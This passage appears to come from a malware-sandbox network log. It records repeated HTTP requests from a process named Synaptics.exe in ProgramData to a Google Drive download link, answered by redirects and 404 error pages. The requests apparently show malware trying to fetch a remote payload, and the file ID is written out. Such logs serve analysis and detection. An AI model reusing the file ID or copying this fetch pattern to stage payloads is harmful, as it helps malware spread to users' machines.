                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Miu6wL18IUpj3Ef3ANgqlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      44192.168.2.1149929142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:44 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4Ey4jYJWFMZ3kTQHVfi5EqgF5cYJ8ZKhMFhtHYaS1BHxTEdMc-UtSW-HvFG4tITNP83Fh3iLI
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-6vfhRP9RCUfnS6f_ms_dNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:44 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:44 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 53 4f 44 73 48 64 2d 41 64 6a 63 53 37 78 70 6a 46 5f 70 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="3SODsHd-AdjcS7xpjF_pwQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:44 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      45192.168.2.1149936142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5ijVgIL3hiezj_7lKE67IOlzlgLTM_UijCaFOnIxMnVz4ZahfxzPwJtKINzzzNbyQp
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-vMLjO7_-RWbXTbCcD8tE6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 48 4f 70 6a 36 6e 70 39 44 72 44 35 44 57 54 47 65 69 61 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="KHOpj6np9DrD5DWTGeiamA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      46192.168.2.1149937172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sRKOqfdg700FP8bJcIXoJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      47192.168.2.1149938172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MX-6qPEeY_5e2c21hK8IUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      48192.168.2.1149942142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:44 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:45 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7Dty4-IaLGjwdlXiIAYppWibQFM7vQai4m69uZ3k7_TD_4wCFuJ_BJ1mhyhmP0Fgm_
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sRJjcQAbP00dM9LDOzoawg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:45 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:45 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 73 37 6a 42 6d 6b 5f 51 39 5f 52 67 4c 31 6c 6a 31 6e 6c 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="6s7jBmk_Q9_RgL1lj1nlCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:45 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      49192.168.2.1149948172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-r99E_9DKji3B0txk2UaTuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      50192.168.2.1149949142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:44 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC418X1USi24Bw7w0INA1ioDTjvJc9d__D49ZEzlcl-ewiJi4WOG6ss0wxAZTgjyWDugCpw0iP8
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
